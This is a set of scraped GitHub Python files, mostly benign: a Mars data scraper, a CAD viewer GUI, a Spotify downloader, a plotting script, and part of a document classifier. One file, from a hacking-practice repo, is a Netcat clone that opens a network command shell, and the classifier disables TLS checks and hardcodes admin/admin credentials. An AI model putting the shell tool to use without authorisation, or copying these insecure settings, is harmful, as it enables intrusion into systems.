+{"seq_id":"21224107204","text":"import requests\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup\nimport time\n\ndef init_browser():\n executable_path = {\"executable_path\": \"/usr/local/bin/chromedriver\"}\n return Browser(\"chrome\", **executable_path, headless=False)\n\ndef scrape_all():\n browser = init_browser()\n # visit NASA News\n url = \"https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204&blank_scope=Latest\"\n browser.visit(url)\n\n time.sleep(2)\n html = browser.html\n soup = BeautifulSoup(html, 'lxml')\n results = soup.find('div', class_=\"list_text\")\n news_title=results.a.text\n news_p=results.find(\"div\",class_='article_teaser_body').text\n browser.quit()\n\n\n browser = init_browser()\n # visit twitter to get Mars weather\n weather_url=\"https://twitter.com/marswxreport?lang=en\"\n browser.visit(weather_url)\n\n time.sleep(1)\n\n response = requests.get(weather_url)\n soup = BeautifulSoup(response.text, 'html.parser')\n results=soup.find_all('div',class_=\"js-tweet-text-container\")\n all_tweet=[result.text for result in results]\n weather=[]\n for x in all_tweet:\n if \"InSight\" in x:\n data={}\n data=x\n weather.append(data)\n weather=weather[0]\n new_weather=weather.replace('\\n','')\n mars_weather=new_weather.rsplit('pic', 1)[0] \n browser.quit()\n\n browser = init_browser()\n # visit the space site to get the latest pic of Mars\n space_url='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\n browser.visit(space_url)\n \n time.sleep(1)\n\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n\n browser.click_link_by_partial_text(\"FULL IMAGE\")\n browser.find_by_css('a.fancybox-next').click() \n browser.click_link_by_partial_href('/spaceimages/detail')\n browser.find_by_css('img.main_image').click()\n featured_image_url=browser.url\n \n browser.quit()\n\n\n browser = init_browser()\n # Mars Hemispheres\n hem_url='https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n browser.visit(hem_url)\n\n time.sleep(1)\n\n html=browser.html\n soup = BeautifulSoup(html, 'html.parser')\n img_url = []\n\n for each_products in range(0,4):\n products = {} \n browser.find_by_css(\"a.product-item h3\")[each_products].click() \n products[\"title\"] = browser.find_by_css(\"h2.title\").text \n button = browser.find_link_by_text(\"Sample\")\n products[\"img_url\"] = button[\"href\"]\n img_url.append(products)\n browser.back() \n\n browser.quit()\n\n\n # put all variables into dict \n all={\n \"news_title\":news_title,\n \"news_p\":news_p,\n \"mars_weather\":mars_weather,\n \"featured_image_url\":featured_image_url,\n \"first_img\":img_url[0]['img_url'],\n \"first_name\":img_url[0]['title'],\n \"second_img\":img_url[1]['img_url'],\n \"second_name\":img_url[1]['title'],\n \"third_img\":img_url[2]['img_url'],\n \"third_name\":img_url[2]['title'],\n \"fourth_img\":img_url[3]['img_url'],\n \"fourth_name\":img_url[3]['title']\n}\n\n return all\n\n\n\n\n","repo_name":"busy0312/W12_Web-scraping-challenge","sub_path":"Missions_to_Mars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"21787535778","text":"from bcad.binterpreter.rqq import *\nfrom bcad.binterpreter.offscreen_display import offscreenViewer3d\nfrom bcad.binterpreter.glfw_display import glfwViewer3d\n\nfrom bcad.binterpreter.events import EVEnum, EventProcessor, ee, ep\nfrom bcad.binterpreter.singleton import Singleton\n\nimport imgui\nfrom imgui.integrations.glfw import GlfwRenderer\n\nimport json\nimport time\n\nclass MainWindow():\n def __init__(self, gui=True, pipe=None, img=None):\n self.use_imgui = gui\n self.use_occt = not gui\n self.please_stop = False\n self.rqq = rqQueue()\n self.texture_updated = False\n self.prev_pos = [0, 0]\n self.offscreen_view_size = [0,0]\n\n if self.use_imgui:\n print(\"Creating IMGUI context\")\n imgui.create_context()\n else:\n print(\"IMGUI disabled\")\n # Create a windowed mode window and its OpenGL context\n\n if self.use_imgui:\n self.canva = glfwViewer3d()\n self.canva.set_pipe(pipe)\n self.canva.set_img(img)\n self.canva.init_driver()\n self.impl = GlfwRenderer(self.canva.window)\n self.objtree = None\n self.show_objtree = True\n self.show_views = True\n else:\n self.canva = offscreenViewer3d()\n self.canva.set_pipe(pipe)\n self.canva.set_img(img)\n\n def parse_reply(self):\n rp = self.canva.pipe.recv()\n jdata = json.loads(rp)\n if jdata['rp'] == replies[RP_IMAGE_DATA]:\n if (self.offscreen_view_size[0] == self.canva.view_size[0]) and (self.offscreen_view_size[1] == self.canva.view_size[1]):\n self.canva.set_image(self.canva.view_size[0], self.canva.view_size[1], data=self.canva.img.buf)\n else:\n self.canva.set_image_black()\n self.canva.reply_received()\n elif jdata['rp'] == replies[RP_ACK]:\n if (self.offscreen_view_size[0] == self.canva.view_size[0]) and (self.offscreen_view_size[1] == self.canva.view_size[1]):\n self.canva.set_image(self.canva.view_size[0], self.canva.view_size[1], data=self.canva.img.buf)\n else:\n self.canva.set_image_black()\n self.canva.reply_received()\n elif jdata['rp'] == replies[RP_ACK_SET_SIZE]:\n self.offscreen_view_size = [jdata['args'][0], jdata['args'][1]]\n if (self.offscreen_view_size[0] == self.canva.view_size[0]) and (self.offscreen_view_size[1] == self.canva.view_size[1]):\n self.canva.set_image(self.canva.view_size[0], self.canva.view_size[1], data=self.canva.img.buf)\n else:\n self.canva.set_image_black()\n self.canva.reply_received()\n elif jdata['rp'] == replies[RP_ACK_GET_OBJECT_TREE]:\n objtree = jdata['args']\n self.objtree = objtree\n self.canva.reply_received()\n elif jdata['rp'] == replies[RP_NOP]:\n self.canva.reply_received()\n\n def object_node(self, node):\n if node:\n if node['children']:\n if (imgui.tree_node(node['name'])):\n for c in node['children']:\n self.object_node(c)\n imgui.tree_pop()\n else:\n imgui.text(node['name'])\n\n def object_tree(self, first_frame, x, y, w, h):\n if first_frame:\n imgui.core.set_next_window_position(x, y, imgui.ALWAYS)\n imgui.begin(\"Objects\")\n\n if self.objtree:\n self.object_node(self.objtree)\n\n hovered = imgui.core.is_window_hovered()\n wh = imgui.core.get_window_size()\n\n imgui.end()\n return hovered, wh\n\n def views_list(self, first_frame, x, y, w, h):\n if first_frame:\n imgui.core.set_next_window_position(x, y, imgui.ALWAYS)\n imgui.begin(\"Views\")\n if imgui.button('Left'):\n self.rqq.rq_set_view('left')\n elif imgui.button('Right'):\n self.rqq.rq_set_view('right')\n elif imgui.button('Top'):\n self.rqq.rq_set_view('top')\n elif imgui.button('Bottom'):\n self.rqq.rq_set_view('bottom')\n elif imgui.button('Front'):\n self.rqq.rq_set_view('front')\n 
elif imgui.button('Rear'):\n self.rqq.rq_set_view('rear')\n elif imgui.button('Iso1'):\n self.rqq.rq_set_view('iso1')\n elif imgui.button('Iso2'):\n self.rqq.rq_set_view('iso2')\n elif imgui.button('Iso3'):\n self.rqq.rq_set_view('iso3')\n elif imgui.button('Iso4'):\n self.rqq.rq_set_view('iso4')\n elif imgui.button('Iso5'):\n self.rqq.rq_set_view('iso5')\n elif imgui.button('Iso6'):\n self.rqq.rq_set_view('iso6')\n elif imgui.button('Iso7'):\n self.rqq.rq_set_view('iso7')\n elif imgui.button('Iso8'):\n self.rqq.rq_set_view('iso8')\n hovered = imgui.core.is_window_hovered()\n wh = imgui.core.get_window_size()\n\n imgui.end()\n return hovered, wh\n\n def mainloop(self):\n if self.use_imgui:\n self.canva.init_shader()\n self.canva.create_objects()\n \n self.rqq.rq_set_size(self.canva.view_size[0], self.canva.view_size[1])\n print(\"Waiting set size reply\")\n self.rqq.process(self.canva)\n self.parse_reply()\n \n self.rqq.rq_get_object_tree()\n print(\"Waiting get object tree reply\")\n self.rqq.process(self.canva)\n self.parse_reply()\n \n self.rqq.rq_load_image()\n last = time.time()\n first_frame = True\n while (not self.canva.should_close() and (not self.please_stop)):\n current = time.time()\n menu_bar_w_h = (0,0)\n objtree_w_h = (0,0)\n views_w_h = (0,0)\n self.canva.proc()\n if self.canva.get_need_resize():\n self.canva.set_image_black()\n self.rqq.rq_set_size(self.canva.view_size[0], self.canva.view_size[1])\n self.canva.start_frame()\n self.canva.swap_buffers()\n self.canva.poll_events()\n continue\n qlen = self.rqq.process(self.canva)\n if (current-last)>1:\n last = current\n self.rqq.rq_check_redraw()\n if self.canva.pipe.poll() == True:\n self.parse_reply()\n self.impl.process_inputs()\n imgui.new_frame()\n\n if imgui.begin_main_menu_bar():\n if imgui.begin_menu(\"File\", True):\n clicked_quit, selected_quit = imgui.menu_item(\"Quit\", 'Ctrl+Q', False, True)\n if clicked_quit:\n self.please_stop = True\n imgui.end_menu()\n if imgui.begin_menu(\"Render\", True):\n imgui.menu_item(\"Save\", None, False, True)\n imgui.end_menu()\n if imgui.begin_menu(\"View\", True):\n clicked_view_objtree, selected_view_objtree = imgui.menu_item(\"Show object tree\", None, False, True)\n if clicked_view_objtree:\n self.show_objtree = not(self.show_objtree)\n clicked_view_views, selected_view_views = imgui.menu_item(\"Show views\", None, False, True)\n if clicked_view_views:\n self.show_views = not(self.show_views)\n imgui.end_menu()\n wh = imgui.core.get_window_size()\n menu_bar_w_h = wh\n imgui.end_main_menu_bar()\n\n hovered = False\n if self.show_objtree:\n hovered, objtree_w_h = self.object_tree(first_frame, 0, menu_bar_w_h[1], 0, 0)\n\n if self.show_views:\n hovered, views_w_h = self.views_list(first_frame, objtree_w_h[0], menu_bar_w_h[1], 0, 0)\n\n if not hovered:\n # right button rotation\n if imgui.is_mouse_down(1):\n if self.canva.drag_start == None:\n pos = imgui.get_io().mouse_pos\n self.canva.drag_start = [pos[0], pos[1]]\n self.rqq.rq_start_rotation(self.canva.drag_start[0], self.canva.drag_start[1])\n else:\n pos = imgui.get_io().mouse_pos\n self.pt = [pos[0], pos[1]]\n self.rqq.rq_rotate(self.pt[0], self.pt[1])\n # left button panning\n elif imgui.is_mouse_down(2):\n if self.canva.drag_start == None:\n pos = imgui.get_io().mouse_pos\n self.canva.drag_start = [pos[0], pos[1]]\n self.prev_pos = pos\n else:\n pos = imgui.get_io().mouse_pos\n if not self.prev_pos == pos:\n self.rqq.rq_pan(pos[0]-self.prev_pos[0], pos[1]-self.prev_pos[1])\n self.prev_pos = pos\n # wheel button scrolling\n 
else:\n self.canva.drag_start = None\n mw = imgui.get_io().mouse_wheel\n pos = imgui.get_io().mouse_pos\n if mw != 0:\n self.rqq.rq_scroll(mw)\n else:\n if not self.prev_pos == pos:\n self.rqq.rq_move(pos[0], pos[1])\n self.prev_pos = pos\n\n first_frame = False\n self.canva.start_frame()\n imgui.render()\n draw_data = imgui.get_draw_data()\n self.impl.render(draw_data)\n self.canva.swap_buffers()\n self.canva.poll_events()\n self.canva.rq_stop()\n self.canva.pipe.close()\n print(\"GUI stopped\")\n else:\n while True:\n ep.process()\n if self.canva.pipe.poll() == True:\n rq = self.canva.pipe.recv()\n jdata = json.loads(rq)\n #print(\"rq:\", rq, \"jdata:\", type(jdata))\n if jdata['rq'] == requests[RQ_LOAD_IMAGE]:\n tex = self.canva.call_load_image()\n elif jdata['rq'] == requests[RQ_START_ROTATION]:\n self.canva.call_start_rotation(jdata['args'][0], jdata['args'][1])\n elif jdata['rq'] == requests[RQ_ROTATE]:\n self.canva.call_rotate(jdata['args'][0], jdata['args'][1])\n elif jdata['rq'] == requests[RQ_SET_SIZE]:\n self.canva.call_set_size(jdata['args'][0], jdata['args'][1])\n elif jdata['rq'] == requests[RQ_SCROLL]:\n self.canva.call_scroll(jdata['args'])\n elif jdata['rq'] == requests[RQ_MOVE]:\n self.canva.call_move(jdata['args'][0], jdata['args'][1])\n elif jdata['rq'] == requests[RQ_PAN]:\n self.canva.call_pan(jdata['args'][0], jdata['args'][1])\n elif jdata['rq'] == requests[RQ_CHECK_REDRAW]:\n self.canva.call_check_redraw()\n elif jdata['rq'] == requests[RQ_GET_OBJECT_TREE]:\n self.canva.call_get_object_tree()\n elif jdata['rq'] == requests[RQ_SET_VIEW]:\n self.canva.call_set_view(jdata['args'])\n elif jdata['rq'] == requests[RQ_STOP]:\n break\n time.sleep(0.01)\n self.canva.img.unlink()\n self.canva.pipe.close()\n print(\"OCCT stopped\")\n","repo_name":"snegovick/bcad","sub_path":"bcad/binterpreter/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":12202,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
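One subtlety in views_list above: imgui.button() both draws the widget and reports a click, so chaining the buttons with elif skips drawing the remaining buttons for any frame in which an earlier one was clicked. Independent ifs, or a loop, keep the layout stable; a sketch assuming pyimgui, called from within an active frame:

import imgui

VIEWS = ['left', 'right', 'top', 'bottom', 'front', 'rear',
         'iso1', 'iso2', 'iso3', 'iso4', 'iso5', 'iso6', 'iso7', 'iso8']

def views_buttons(rqq):
    # Draw every button each frame; fire the request for whichever was clicked.
    for name in VIEWS:
        if imgui.button(name.capitalize()):
            rqq.rq_set_view(name)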
+{"seq_id":"73778174624","text":"from datetime import datetime\nfrom random import randint\nfrom flask import Flask, render_template\nfrom configparser import ConfigParser \n\ncp = ConfigParser()\ncp.read('config.cfg')\nlower_m_delta = cp.getint('general','lower_m_delta')\nupper_m_delta = cp.getint('general','upper_m_delta')\nport = cp.getint('general','port')\n\napp = Flask(__name__)\n\n@app.route('/')\ndef root():\n\n sides = ['to', 'past']\n d = datetime.now()\n min_delta = randint(lower_m_delta,upper_m_delta)\n\n side_idx = randint(0,1)\n side = sides[side_idx]\n\n hour = d.hour\n minute = d.minute\n\n if side_idx == 0:\n minute = minute + min_delta\n if minute > 59:\n hour = (hour + (minute / 60)) % 24\n minute = minute % 60\n else:\n minute = minute - min_delta\n if minute < 0:\n hour = (hour + (minute / 60)) % 24\n minute = minute % 60\n broken_time = \"The time is {} minute{} {} {:02d}:{:02d} hrs\".format(min_delta, 's' if min_delta > 1 else '', side, int(hour), int(minute))\n actual_time = \"The actual time is {} hrs\".format(d.strftime('%H:%m:%S'))\n return render_template('home.html', broken_time=broken_time,actual_time=actual_time)\n\napp.run('0.0.0.0', port)\n","repo_name":"desonalleyne/broken_timebox","sub_path":"root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"43208896170","text":"import argparse\nimport socket\nimport shlex\nimport subprocess\nimport sys\nimport textwrap\nimport threading\n\ndef execute(cmd):\n cmd = cmd.strip()\n if not cmd:\n return\n output = subprocess.check_output(shlex.split(cmd),stderr = subprocess.STDOUT)\n\n return output.decode()\n\nclass NetCat:\n def __init__(self, args, buffer=None):\n self.args = args\n self.buffer = buffer\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n def run(self):\n if self.args.listen:\n self.listen()\n else:\n self.send()\n \n def send(self):\n self.socket.connect((self.args.target, self.args.port))\n if self.buffer:\n self.socket.send(self.buffer)\n \n try:\n while True:\n recv_length = 1\n res = ''\n while recv_length:\n data = self.socket.recv(4096)\n recv_length = len(data)\n res += data.decode()\n if recv_length < 4096:\n break\n if res:\n print(res)\n buffer = input('> ')\n buffer += '\\n'\n self.socket.send(buffer.encode())\n except KeyboardInterrupt:\n print(\"User terminated!\")\n self.socket.close()\n sys.exit()\n\n def listen(self):\n self.socket.bind((self.args.target, self.args.port))\n self.socket.listen(5)\n\n while True:\n client_socket, _ = self.socket.accept()\n client_thread = threading.Thread(target=self.handle, args=(client_socket,))\n client_thread.start()\n \n def handle(self, client_socket):\n if self.args.execute:\n output = execute(self.args.execute)\n client_socket.send(output.encode())\n \n elif self.args.upload:\n file_buffer = b''\n while True:\n data = client_socket.recv(4096)\n if data:\n file_buffer += data\n else:\n break\n \n with open(self.args.upload, 'wb') as f:\n f.write(file_buffer)\n \n message = f'Saved file {self.args.uploads}'\n client_socket.send(message.encode())\n \n elif self.args.command:\n cmd_buffer = b''\n while True:\n try:\n client_socket.send(b'l3vi4th4n@send #> ')\n while '\\n' not in cmd_buffer.decode():\n cmd_buffer += client_socket.recv(64)\n \n res = execute(cmd_buffer.decode())\n if res:\n client_socket.send(res.encode())\n \n cmd_buffer = b''\n except Exception as e:\n print(f'server kill {e}')\n self.socket.close()\n sys.exit()\n \n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='l3vi4th4n Net Tool', \n formatter_class=argparse.RawDescriptionHelpFormatter, \n epilog = textwrap.dedent('''[Example]:\n Netcat.py -t [HOST] -p [PORT] -l -c # command shell\n Netcat.py -t [HOST] -p [PORT] -l -u=[FILENAME] # upload the file\n Netcat.py -t [HOST] -p [PORT] -l -e [COMMAND] # execute specified command\n Netcat.py -t [HOST] -p [PORT] # connect the HOST\n echo 'ABC' | ./Netcat.py -t [HOST] -p [PORT] # send the 'ABC' to HOST PORT\n '''))\n \n parser.add_argument('-c', '--command', action='store_true', help='command shell')\n parser.add_argument('-e', '--execute', help='execute specified command')\n parser.add_argument('-l', '--listen', action='store_true', help='listen')\n parser.add_argument('-p', '--port', type=int, default=5555, help='spcified port')\n parser.add_argument('-t', '--target', help='specified host')\n parser.add_argument('-u', '--upload',help='upload file')\n args = parser.parse_args()\n\n if args.listen:\n buffer = ''\n else:\n buffer = sys.stdin.read()\n\n nc = NetCat(args, buffer.encode())\n nc.run()\n\n","repo_name":"k3lpi3b4nsh33/Python-Hacking","sub_path":"1. 
Basic Networking Tools/Netcat.py","file_name":"Netcat.py","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
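The --upload handler above reads until recv() returns b'', which only happens once the peer closes or shuts down its write side; a plain interactive client would therefore hang it. A matching one-shot sender sketch (host and port values are placeholders):

import socket

def send_file(path, host='127.0.0.1', port=5555):
    with socket.create_connection((host, port)) as s, open(path, 'rb') as f:
        s.sendall(f.read())
        s.shutdown(socket.SHUT_WR)    # signal EOF so the server's recv loop ends
        print(s.recv(4096).decode())  # read the 'Saved file ...' confirmation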
+{"seq_id":"10719732620","text":"import requests\nimport time\nimport downloader\nfrom auth import SPOTIFY_GET_CURRENT_TRACK_URL,SPOTIFY_GET_USER_QUEUE_URL\nfrom pprint import pprint\nfrom tkinter import *\n\nclass Spotify:\n def __init__(self):\n self.__url_gct = SPOTIFY_GET_CURRENT_TRACK_URL\n self.__url_gcq = SPOTIFY_GET_USER_QUEUE_URL\n self.__menu()\n\n def main_gct(self):\n current_track_info = self.get_current_track()\n n = current_track_info['track_name']\n downloader.Downloader(n).down()\n\n def main_gcq(self):\n\n current_track_info = self.get_current_queue()\n ls1 = list((current_track_info.values()))\n for i in ls1:\n downloader.Downloader(i).down()\n\n def get_current_queue(self):\n\n response = requests.get(\n self.__url_gcq,\n headers={\n \"Authorization\": f\"Bearer {self.__access_token_gcq}\"\n }\n )\n json_new = response.json()\n\n ls_id = []\n ls_name = []\n for i in json_new[\"queue\"]:\n if i[\"id\"] not in ls_id:\n ls_id.append(i[\"id\"])\n if i[\"name\"] not in ls_name:\n ls_name.append(i[\"name\"])\n dict_fn = dict(zip(ls_name, ls_id))\n return (dict_fn)\n\n def get_current_track(self):\n\n response = requests.get(\n self.__url_gct,\n headers={\n \"Authorization\": f\"Bearer {self.__access_token_gct}\"\n }\n )\n json_resp = response.json()\n\n track_id = json_resp['item']['id']\n track_name = json_resp['item']['name']\n artists = [artist for artist in json_resp['item']['artists']]\n link = json_resp['item']['external_urls']['spotify']\n artist_names = ', '.join([artist['name'] for artist in artists])\n\n current_track_info = {\n \"id\": track_id,\n \"track_name\": track_name,\n \"artists\": artist_names,\n \"link\": link\n }\n return current_track_info\n def __menu(self):\n self.root =Tk()\n self.root.geometry(\"1580x380\")\n\n filename = PhotoImage(file=\"light.png\")\n background_label = Label(self.root, image=filename)\n background_label.place(x=0, y=0, relwidth=1, relheight=1)\n\n img = PhotoImage(file=\"icon.png\")\n self.root.iconphoto(False, img)\n self.root.title(\"Spotify_Audio_Downloader\")\n\n self.e1 = Entry(self.root, width=40,borderwidth=10, bg=\"green\", fg=\"white\")\n self.e1.grid(row=5, column=0, columnspan=2)\n self.e2 = Entry(self.root, width=40,borderwidth=10, bg=\"green\", fg=\"white\")\n self.e2.grid(row=5, column=2, columnspan=2)\n\n self.myLabel1 = Label(self.root,text=\"Developed By Author\").grid(row=0,column=5)\n self.myLabel2 = Label(self.root,text=\"Date Created on 23/10/2022\").grid(row=1,column=5)\n self.myLabel2 = Label(self.root, text=\" \").grid(row=2, column=0)\n\n self.myButton1 = Button(self.root,text=\"Enter auth code below and press to download currently playing track\",borderwidth=5,command=self.click1,padx=20,pady=20).grid(row=3,column=0,columnspan=2)\n self.myButton2 = Button(self.root, text=\"Enter auth code below and press to download top 2 queued playlist tracks\",borderwidth=5,command=self.click2,padx=20,pady=20).grid(row=3,column=2,columnspan=2)\n self.myButton3 = Button(self.root, text=\"Press to exit the window\",borderwidth=5,command=self.root.quit,padx=20,pady=20).grid(row=3,column=4,columnspan=2)\n self.myButton4=Button(self.root, text=\"Press to clear text\",borderwidth=5,command=self.clear1,padx=20,pady=20).grid(row=7,column=0,columnspan=2)\n self.myButton5=Button(self.root, text=\"Press to clear text\",borderwidth=5,command=self.clear2,padx=20,pady=20).grid(row=7,column=2,columnspan=2)\n\n self.myLabel3 = Label(self.root, text=\" \").grid(row=4, column=0)\n self.myLabel0 = Label(self.root, text=\" 
\").grid(row=6, column=0)\n self.myLabel6 = Label(self.root, text=\" \").grid(row=8, column=0)\n\n self.root.mainloop()\n\n def click1(self):\n self.__access_token_gct=self.e1.get()\n self.main_gct()\n\n def click2(self):\n self.__access_token_gcq = self.e2.get()\n self.main_gcq()\n\n def clear1(self):\n self.e1.delete(0,END)\n\n def clear2(self):\n self.e2.delete(0,END)\n\n\nif __name__ == '__main__':\n Spotify()\n","repo_name":"hrshankar2002/Spotify-audio-scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"28172304580","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom scipy.integrate import ode\nimport scipy.optimize\n\nimport seaborn as sns\n\nimport matplotlib\ncolors = matplotlib.rcParams['axes.prop_cycle'].by_key()['color']\nblack = matplotlib.rcParams['axes.labelcolor']\n\ntcellcolor = '#0E1E97'\ntcellcoloralt = '#0e7b97'\npmhccolor = colors[3]\ncolors = [tcellcolor, tcellcoloralt, pmhccolor]\n\nimport sys\nsys.path.append('..')\nimport plotting\nfrom lib import *\n \nplt.style.use('../paper.mplstyle')\n\ndef T7(T0, K):\n ts = [0.0, 3.5, 7.0]\n xs = odeint(fcompfull, [T0, C], ts, args=(alpha, mu, K, delta))\n return xs[-1, 0]\n\n# parameters as in Fig.3D (slowly increasing antigen availability)\nalpha = 1.2\nmu = -0.5\ndelta = 0.0\nC = 10\nT0s = np.logspace(0, 3, 50)\nKs = np.logspace(0, 3, 50)\n\n# alternative parameters as in Fig.1\n#alpha = 1.5\n#mu = 1.2\n#delta = 0.22\n#C = 10**6.7\n#T0s = np.logspace(0, 6.5, 50)\n#Ks = np.logspace(0, 6.5, 50)\n\n\nfoldexpansions = np.zeros((len(T0s), len(Ks)))\nfor i, T0 in enumerate(T0s):\n for j, K in enumerate(Ks):\n foldexpansions[i, j] = T7(T0, K)/T0\n\nfig, ax = plt.subplots(figsize=(2.75, 2.25))\nX, Y = np.meshgrid(Ks, T0s)\nplt.pcolor(X, Y, np.log10(foldexpansions), cmap='viridis')\ncbar = plt.colorbar()\ncbar.set_label('log$_{10}$ fold expansion')\nCS = ax.contour(X, Y, foldexpansions, colors='w', levels=[3, 10, 100, 400])\nax.set_xscale('log')\nax.set_yscale('log')\nplt.clabel(CS, CS.levels, inline=False, inline_spacing=2, fmt='%g')\nax.set_xlabel('$K$')\nax.set_ylabel('$T(0)$')\nfig.tight_layout()\nplt.show()\nfig.savefig('figS1.svg')\nfig.savefig('figS1.png', dpi=300)\n","repo_name":"andim/paper-tcellexp","sub_path":"figS1/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"36520735809","text":"import pandas as pd\nimport requests as reql\nimport pickle\nfrom flask import Flask\nimport doc_processing\nfrom unclassified_grouping import find_group\nfrom document_similarity import *\nfrom data_extractor import *\n# from discovery_connector import call_classification\nfrom loguru import logger\nimport re\nimport os\nimport nltk\nimport configparser\nimport classifier_transactions\nfrom loguru import logger\nimport error_updation\nfrom error_updation import *\nimport datetime\nfrom datetime import timedelta\nimport os\nimport os.path\nimport shutil\nfrom dbprocess import dbprocess\nfrom build_models import unclassified_doc_update\nfrom build_models import classified_doc_update\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.connection import create_ssl_context\nimport ssl\nfrom elastic_update import update_group_es\n\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\napp = Flask(__name__)\n\n#logger.add(loginfo_filename, format=\"{time:YYYY-MM-DD at HH:mm:ss} | {level} | {message}\", backtrace=True,\n# level='DEBUG', rotation=\"1 week\", compression=\"zip\", enqueue=True)\n\npath_separator = config['CLASSIFIER']['PATH_SEP']\ntemp_directory = config['CLASSIFIER']['TEMP_DIR_LOC']\nclassification_model_accuracy = config['CLASSIFIER']['CLASSIFICATION_FINAL_ACCURACY']\nsimiliarity_accuracy = config['CLASSIFIER']['DOC_SIMILIARITY_ACCURACY']\nroot_dir = config['CLASSIFIER']['TRAINING_DATASET_LOCATION']\nextraction_loc = config['CLASSIFIER']['CLASSIFIED_METADATA']\nmax_file_size = int(config['CLASSIFIER']['SOURCE_FILE_SIZE_MAXBYTE'])\nmin_file_size= int(config['CLASSIFIER']['SOURCE_FILE_SIZE_MINBYTE'])\nmodel_location = config['CLASSIFIER']['MODEL_SAVE_LOCATION']\nclass_predicted_loc = config['CLASSIFIER']['CLASSIFIED_RESULT']\nclass_error_loc = config['CLASSIFIER']['CLASSIFIED_ERROR']\nsim_template_loc = config['CLASSIFIER']['SIM_TEMPLATE_GROUP']\n\nvector_model_pkl = config['CLASSIFIER']['VEC_MODEL_PKL_NAME']\nclass_model_pkl = config['CLASSIFIER']['CLASS_PKL_NAME']\nis_model_enabled = False\nlog_level = config['CLASSIFIER']['LOG_LEVEL']\nlog_location = config['CLASSIFIER']['LOGGER_LOC']\nlog_name = os.path.normpath(os.path.join(log_location, \"classifier_log.log\"))\nloginfo_filename = config['CLASSIFIER']['LOGINFO_FILENAME']\nlogdebug_filename = config['CLASSIFIER']['LOGDEBUG_FILENAME']\nerror_code=config['CLASSIFIER']['CLASSIFIER_ERROR_CODE']\nwrite_file_system = config['CLASSIFIER']['FILE_OUT']\nocr_store_full_text = int(config['CLASSIFIER']['OCR_STORE_FULL_TEXT'])\n\nmodel_path = os.path.normpath(os.path.join(model_location, class_model_pkl))\nvec_model_path = os.path.normpath(os.path.join(model_location, vector_model_pkl))\nes_host = config['CLASSIFIER']['ES_HOST']\nes_port = config['CLASSIFIER']['ES_PORT']\nindex = config['CLASSIFIER']['INDEX']\n\n\nssl_context = create_ssl_context()\nssl_context.check_hostname = False\nssl_context.verify_mode = ssl.CERT_NONE\nes = Elasticsearch([{'host': es_host, 'port': es_port}],scheme=\"https\",\n # to ensure that it does not use the default value `True`\n verify_certs=False,\n ssl_context= ssl_context,\n http_auth=(\"admin\", \"admin\"))\n\ndt = str(datetime.datetime.now()).replace(\":\",\"_\")\nnewname = 'classifier_loginfor.log'+'.zip'+dt+'.zip'\nnewname_debug = 'classifier_logdebug.log'+'.zip' +dt+ '.zip'\nif os.path.exists('classifier_loginfor.log' +'.zip'):\n os.rename('classifier_loginfor.log' +'.zip', newname)\n shutil.move(newname,log_location )\nif 
os.path.exists('classifier_logdebug.log' +'.zip'):\n os.rename('classifier_logdebug.log' +'.zip', newname_debug)\n shutil.move(newname_debug,log_location )\nlogger.add('classifier_loginfor.log' , format=\"{time} {message} | {level} | {message}\", backtrace=True, level='INFO', rotation=\"1 day\", enqueue=True, compression=\"zip\")\nlogger.add('classifier_logdebug.log' , format=\"{time} {message} | {level} | {message}\", backtrace=True, level='DEBUG', rotation=\"1 day\", enqueue=True, compression=\"zip\")\n\n\ndef remove_stop_words(text):\n import spacy\n from spacy.lang.en import English\n from spacy.lang.en.stop_words import STOP_WORDS\n nlp = English()\n # \"nlp\" Object is used to create documents with linguistic annotations.\n document = nlp(text)\n # Create list of word tokens\n token_list = []\n for token in document:\n token_list.append(token.text)\n\n # Create list of word tokens after removing stopwords\n filtered_sentence = []\n for word in token_list:\n lexeme = nlp.vocab[word]\n if lexeme.is_stop == False:\n filtered_sentence.append(word)\n return ' '.join(filtered_sentence)\n\ntemplates = []\nfor name in os.listdir(root_dir):\n templates.append(name)\nlogger.info(\"\\n\\n templates : {}\", templates)\n\n\nfrom sklearn import preprocessing\nle = preprocessing.LabelEncoder()\nle.fit(templates)\ntemplate_id = le.transform(le.classes_)\ncategorydf = pd.DataFrame({'template_id': template_id, 'templates': templates})\ncategorydf = categorydf.sort_values('template_id')\nid_to_category = dict(categorydf[['template_id', 'templates']].values)\nlogger.info(\" \\n\\n id_to_category : {}\", id_to_category)\n\n\nunclassified_dict = {}\nprediction_json = {}\n\n\ndef tokenize_stem(text):\n from nltk.stem.snowball import SnowballStemmer\n stemmer = SnowballStemmer(\"english\")\n logger.info(\"\\n\\n tokenize_stem : {}\")\n tokens = [word for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]\n filtered_tokens = []\n # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)\n for token in tokens:\n if 